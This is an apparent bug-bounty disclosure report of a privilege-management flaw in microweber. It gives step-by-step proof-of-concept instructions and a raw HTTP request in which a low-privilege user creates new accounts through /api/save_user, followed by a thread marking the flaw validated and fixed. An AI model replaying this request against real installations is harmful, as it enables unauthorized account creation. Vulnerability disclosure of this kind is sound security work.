Improper Privilege Management in microweber/microweber


Reported on

Sep 9th 2021

✍️ Description

A simple user without Super Admin access is able to add further users to the system.

🕵️‍♂️ Proof of Concept (BurpSuite or proxy utility is required)

  • 1;Simply add a simple User roled user ( USER A ).

  • 2; Log in with USER A

  • 3; Obtain the X-Csrf-Token and the Cookie value of USER A

  • 4; Send the following request with modified values and insert the obtained X-Csrf-Token and the Cookie value

POST /api/save_user HTTP/1.1
Content-Length: 226
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<INSERT_HOSTNAME_HERE>/admin/view:modules/load_module:users/edit-user:0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


Upon sending the request, the user is being added, and the malicious user is able to log in.

💥 Impact

The administrator feature is being disclosed for any authenticated users. This means, the administrator logic controls can be bypassed.

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
TheLabda has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov
2 years ago


issue is valid only when you are logged in as admin

Peter Ivanov marked this as fixed with commit 4565be 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation